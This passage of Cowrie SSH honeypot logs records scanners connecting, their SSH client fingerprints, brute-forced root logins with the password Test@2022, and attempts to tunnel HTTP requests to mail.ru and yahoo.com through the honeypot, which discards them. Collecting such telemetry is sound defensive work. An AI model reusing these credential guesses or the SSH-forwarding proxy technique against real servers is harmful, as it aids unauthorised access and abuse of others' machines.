stp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.541635Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52934,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b7ceb95196e","protocol":"ssh","message":"New connection: 212.227.125.160:52934 (1.2.3.4:22) [session: 2b7ceb95196e]","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.698816Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.791907Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6702,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6702","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.842957Z","session":"81e5651b8f67"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.864817Z","src_ip":"212.227.125.160","session":"2b7ceb95196e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.893236Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.962542Z","src_ip":"212.227.235.229","session":"8a51d14d90b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.963228Z","src_ip":"212.227.235.229","session":"8a51d14d90b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":23361,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23361","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.036690Z","session":"81e5651b8f67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.086910Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":3681,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3681","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.228708Z","session":"81e5651b8f67"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.239417Z","src_ip":"212.227.125.160","session":"06bc6d1c0b1f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.279219Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.330351Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c272d7e10b6","protocol":"ssh","message":"New connection: 77.83.207.83:55398 (1.2.3.4:22) [session: 9c272d7e10b6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.379637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.380355Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.430837Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.681681Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16389,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16389","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.733094Z","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.783347Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17646,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17646","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.924694Z","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:27.975043Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":16685,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16685","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.116643Z","session":"9c272d7e10b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.166979Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.218235Z","src_ip":"77.83.207.83","session":"9c272d7e10b6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55486,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e33b526072d","protocol":"ssh","message":"New connection: 77.83.207.83:55486 (1.2.3.4:22) [session: 8e33b526072d]","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.267374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.268426Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.318773Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.570871Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3088,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3088","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.622395Z","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.673320Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":230,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:230","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.816929Z","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:28.867747Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":2683,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2683","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.009279Z","session":"8e33b526072d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.060028Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.111098Z","src_ip":"77.83.207.83","session":"8e33b526072d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55570,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2006ef274ec","protocol":"ssh","message":"New connection: 77.83.207.83:55570 (1.2.3.4:22) [session: b2006ef274ec]","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.160213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.170884Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.210850Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.461411Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26539,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26539","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.512764Z","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.563122Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22929,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22929","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.716659Z","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.767484Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12307,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12307","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.908649Z","session":"b2006ef274ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:29.958983Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.010020Z","src_ip":"77.83.207.83","session":"b2006ef274ec"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55651,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f1f5be11d6","protocol":"ssh","message":"New connection: 77.83.207.83:55651 (1.2.3.4:22) [session: f0f1f5be11d6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.059281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.060062Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.110931Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25516,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dbdbeb90289","protocol":"ssh","message":"New connection: 212.227.235.229:25516 (1.2.3.4:22) [session: 2dbdbeb90289]","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.333544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.334421Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.364687Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
